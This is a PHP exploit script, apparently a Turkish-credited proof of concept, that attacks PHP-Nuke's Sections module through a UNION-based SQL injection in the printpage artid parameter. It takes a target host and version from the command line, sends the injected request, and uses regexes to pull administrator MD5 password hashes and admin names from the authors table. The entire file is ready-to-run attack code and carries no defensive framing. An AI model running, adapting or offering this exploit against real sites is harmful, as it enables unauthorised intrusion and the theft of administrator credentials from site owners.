<?php error_reporting (E_ERROR); ini_set("max_execution_time",0); echo ' +=========================================================+ |PHP-NUKE Module Sections printpage artid Sql inj Vuln. |&#304;MHAT&#304;M&#304;.ORG BugBUSTER Team. | +=========================================================+ <+> version <8.0 <+> Tested on 7.9 & 6.0 '; if ($argc < 2){ print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n"; print "ex.: " . $argv[0] . " phpnuke.org 7\n"; credits(); exit; } /* Ac&#305;klama */ if (empty($argv[3])){ $prefix = 'nuke';} #Prefix girin. else {$prefix = $argv[3];} switch ($argv[2]){ case "6": $query ="modules.php?name=Sections&op=printpage&artid=99999+union+select+aid,pwd+from+".$prefix."_authors"; $version = 6; break; default: $query ="modules.php?name=Sections&op=printpage&artid=99999'+union+select+aid,pwd+from+".$prefix."_authors"; $version = 7; break; } $host = 'http://' . $argv[1] . '/'; # argv[1] - host $http = $host . $query; echo '[+] host: '.$host . ' [+] nuke version: '.$version.' '; #DEBUG //print $http . "\n"; $result = file_get_contents($http); preg_match("/([a-f0-9]{32})/", $result, $matches); if ($matches[0]) {print "Hashs.: ".$matches[0]; if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];} else {echo "Basar&#305;s&#305;z(Exploit Failed)...";} credits(); function credits(){ print "\n\n+========================================+\n\r Coded By dumenci \n\r Copyright (c) BugBUSTERs"; print "\n\r+========================================+\n"; exit; } ?>